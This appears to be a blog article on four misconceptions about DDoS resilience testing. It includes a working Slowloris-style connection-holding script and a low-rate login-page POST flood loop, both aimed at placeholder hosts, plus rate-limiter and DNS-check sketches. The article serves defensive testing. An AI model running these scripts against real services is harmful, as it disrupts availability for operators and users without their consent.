Four Misconceptions about DDoS Testing
Most organizations already understand the importance of running a controlled DDoS attack to evaluate the resilience of their applications and to practice incident response. However, misconceptions persist about the process, tools, and goals of DDoS testing.
You can DIY – all you need is a DDoS attack tool
There are many options for running DDoS simulations to validate your protection. You can use open-source attack tools, such as HTTP Unbearable Load King (HULK) or Slowloris, or commercial self-service tools from various vendors that let you independently launch a range of DDoS attack vectors.
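To make the category of tool concrete, here is a minimal Slowloris-style sketch in Python. The target hostname is a placeholder, and this kind of code should only ever be pointed at infrastructure you own and are explicitly authorized to test:

```python
# Minimal Slowloris-style sketch: holds many HTTP connections open by
# sending headers very slowly, tying up the server's connection pool.
# TARGET is a placeholder -- only run this against systems you are
# explicitly authorized to test.
import socket
import time

TARGET = "test.example.com"   # hypothetical, authorized test target
PORT = 80
CONNECTIONS = 200

def open_socket(host, port):
    s = socket.create_connection((host, port), timeout=4)
    # Send an incomplete request line and headers, never the final CRLF,
    # so the server keeps the connection open waiting for the rest.
    s.send(b"GET /?id=1 HTTP/1.1\r\n")
    s.send(f"Host: {host}\r\n".encode())
    s.send(b"User-Agent: ddos-test-sketch\r\n")
    return s

sockets = []
for _ in range(CONNECTIONS):
    try:
        sockets.append(open_socket(TARGET, PORT))
    except OSError:
        break

while sockets:
    # Every 10 seconds, send another partial header on each connection
    # so the server keeps waiting for the request to complete.
    for s in list(sockets):
        try:
            s.send(b"X-a: keep-alive\r\n")
        except OSError:
            sockets.remove(s)  # server closed it; a real tool would reconnect
    time.sleep(10)
```

Tools like this are easy to run, which is exactly the point of the misconception: launching the attack is the trivial part.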
But here’s the catch. Your goal is not just to launch attacks and mark each one pass or fail. You want to challenge your defenses with sophisticated attacks that are as close as possible to what a real attacker would launch after probing your system for weak points. More importantly, you need to be able to draw conclusions from the results and improve your protection, whether through better attack identification, configuration tweaks, or changes to your core architecture.
DDoS testing requires specific expertise, with time and resources dedicated to planning, execution, and assessment of defense hardening options.
Simulating an attack from a few machines can validate your protection against a large botnet attack
A DDoS simulation that generates traffic from a few machines cannot realistically predict how your systems will behave under an attack from a large botnet, such as one with 1,000 machines and as many IP addresses.
Beyond the obvious difference in traffic volume, a DDoS attack executed from many different IP addresses can bypass IP-based protection mechanisms such as rate limiting or IP reputation. It is simply impossible to test the effect of such an attack with a small-scale simulation.
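To see why, consider a simplified per-IP token-bucket rate limiter of the kind many protection layers apply. This is a sketch with illustrative numbers, not any vendor's actual implementation: a test from two machines trips the limiter almost immediately, while the same total request rate spread across 1,000 bots stays under every per-source threshold.

```python
# Sketch of a per-IP token-bucket rate limiter, illustrating why
# distributed attacks bypass per-source thresholds. The rate and burst
# values are illustrative, not taken from any real product.
import time
from collections import defaultdict

RATE = 10    # allowed requests per second, per source IP
BURST = 20   # bucket capacity

buckets = defaultdict(lambda: {"tokens": BURST, "last": time.monotonic()})

def allow(ip: str) -> bool:
    b = buckets[ip]
    now = time.monotonic()
    # Refill tokens for the time elapsed, capped at the bucket size.
    b["tokens"] = min(BURST, b["tokens"] + (now - b["last"]) * RATE)
    b["last"] = now
    if b["tokens"] >= 1:
        b["tokens"] -= 1
        return True
    return False  # request dropped or challenged

# 1,000 requests from a single test machine: almost all get blocked.
blocked = sum(not allow("10.0.0.1") for _ in range(1000))
print(f"single source: {blocked}/1000 blocked")

# 1,000 requests from 1,000 distinct bot IPs: every one is allowed.
allowed = sum(allow(f"10.0.{i // 256}.{i % 256}") for i in range(1000))
print(f"1,000 sources: {allowed}/1000 allowed")
```

The defense that looks airtight in a two-machine test contributes nothing against the distributed version of the same load.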
Testing your top parent domain covers your bases
Companies often assume that running a test on the top domain or address is sufficient to predict the outcome of an attack on other addresses, such as a subdomain or a different hostname.
But the reality is that subdomains, for example, often point to a different service, with different systems and a different protection architecture. We often discover during testing that, unlike the top domain, a subdomain providing business-critical services is not covered by the organization’s DDoS protection service, such as Imperva or Akamai, and is completely vulnerable to attack.
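A quick way to spot this gap is to compare where the apex domain and each subdomain actually resolve. The sketch below (hostnames and provider hints are placeholders, and the hint list is illustrative rather than exhaustive) checks whether each name's CNAME points at a protection provider's edge network or straight at an unprotected origin:

```python
# Sketch: compare where the apex domain and its subdomains resolve,
# to spot subdomains that bypass the DDoS protection layer.
# Requires dnspython (pip install dnspython). Hostnames are placeholders.
import dns.resolver

# Hypothetical inventory: the apex plus business-critical subdomains.
HOSTS = ["example.com", "www.example.com",
         "login.example.com", "api.example.com"]

# Substrings that suggest a protected edge (illustrative, not exhaustive).
PROTECTED_HINTS = ("incapdns.net", "edgekey.net", "akamaiedge.net")

for host in HOSTS:
    try:
        answer = dns.resolver.resolve(host, "CNAME")
        target = str(answer[0].target).rstrip(".")
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        target = "(no CNAME -- resolves directly to an origin IP)"
    protected = any(hint in target for hint in PROTECTED_HINTS)
    print(f"{host:25} -> {target:45} protected={protected}")
```

Any business-critical hostname that resolves straight to an origin IP deserves its own place in the test plan, not an assumption that the apex result carries over.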
Simulating a large-volume attack is what matters most
DDoS attacks are typically associated with large traffic volumes. A popular notion is that the larger the attack, the more potent it is. This is a misconception: application-layer attacks such as an HTTP flood can be extremely effective at bringing down web and application servers with smaller traffic volumes that are less likely to be detected.
Functional areas of a website that interact with and process data in real time across several services are the most vulnerable to such attacks. Think, for example, of a login page that constantly communicates with a database server. It is wide open to low-volume traffic that is difficult to identify as a DDoS event.
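As a sketch of how little traffic such a test needs (the URL and form fields are hypothetical, and this should only run against systems you are authorized to test), a handful of requests per second against a database-backed login endpoint can be enough to saturate the backend:

```python
# Sketch: low-rate application-layer test against an expensive endpoint.
# A few requests per second to a database-backed login page can exhaust
# backend capacity while staying far below volumetric detection thresholds.
# URL and form fields are hypothetical; use only with authorization.
import time
import urllib.parse
import urllib.request

URL = "https://test.example.com/login"   # placeholder, authorized target
RATE = 5                                 # requests/second -- tiny by network standards

body = urllib.parse.urlencode({"user": "probe", "password": "x"}).encode()

while True:
    start = time.monotonic()
    try:
        with urllib.request.urlopen(URL, data=body, timeout=10) as resp:
            latency = time.monotonic() - start
            # Rising latency under a constant, low request rate is the
            # signal that the backend (not the network) is the bottleneck.
            print(f"status={resp.status} latency={latency:.2f}s")
    except OSError as exc:
        print(f"request failed: {exc}")
    time.sleep(1 / RATE)
```

At five requests per second, this traffic is invisible to volume-based thresholds, which is precisely why application-layer scenarios belong in any serious test plan alongside the volumetric ones.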